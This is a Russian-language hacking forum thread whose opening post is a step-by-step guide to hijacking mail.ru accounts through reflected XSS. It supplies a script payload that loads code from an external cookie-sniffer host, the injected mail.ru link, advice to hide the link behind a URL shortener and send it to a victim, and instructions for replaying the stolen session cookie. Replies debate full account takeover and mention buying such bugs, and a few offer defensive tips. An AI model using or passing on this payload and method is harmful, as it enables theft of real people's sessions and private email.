Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss. 1.Нам понадобиться Пассивка 2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/ 3.Мозги и руки ! Так заходим на сниффер и берём Код для пассивной XSS атаки вот он Code: %3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>" мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так Code: http://mail.ru/###********=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>" Если жертва перейдёт по этой ссылке то куки придут на наш сниффер. Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/ заходим на этот сайт и где написано Code: Enter a long URL to make tiny: вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку Code: make a TinyURL И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас. Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы. Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают. ну чтож думаю всё ! не забываем про "+" Автор : Tickhack
tickhack, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло? После этого что делать?
после этого заходишь на майл.ру и попадаешь на мыло жертвы только не забудь заменить куки жертвы на свои в опере
martmm, tickhack, вы неправильно поняли вопрос. Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?
Ну если я не отстал от жизни, то думаю никак. Разве мегабаг найдут. Видел пару тем, в которых предлагают купить: Как это делают, хз.
Стандартных возможностей для этого в почтовом сервисе разумеется нет. Так же, как нет стандартных возможностей внедрения JS-кода, кражи сессий и т.д.
В мейле это невозможно. Сейчас можно только: в одноклассниках, вконтакте. Раньше можно было в яндексе
Ребята, а кким образом можно обезопасить себе на mail.ru, чтоб не стать жертвой XSS? фейк, СИ - не пройдет как бы 98% это я о себе, но боюсь, что с помощю XSS это сделают. Может есть какие то решения как можно больше обезопасить себя?
thrust, сессия с одного IP не поможет. Через XSS можно не только куки украсть, но и прочитать все письма непосредственно из твоего браузера. B1t.exe, не заходи на мыло через веб-интерфейс, используй почтовые клиенты.
Он уже стоит у меня (или по умолчанию у всех стоит) без клиента никак? просто никак немогу привыкать клиенты. мне они не нравятся.
Можно еще отключить JS в браузере. Но удобнее юзать клиент. В этой статье можно было описать хотя бы старый нерабочий способ или указать ссылки на темы продаж. "Как угнать куки через пассивку" != "Взлом мыла с помощью пассивной xss"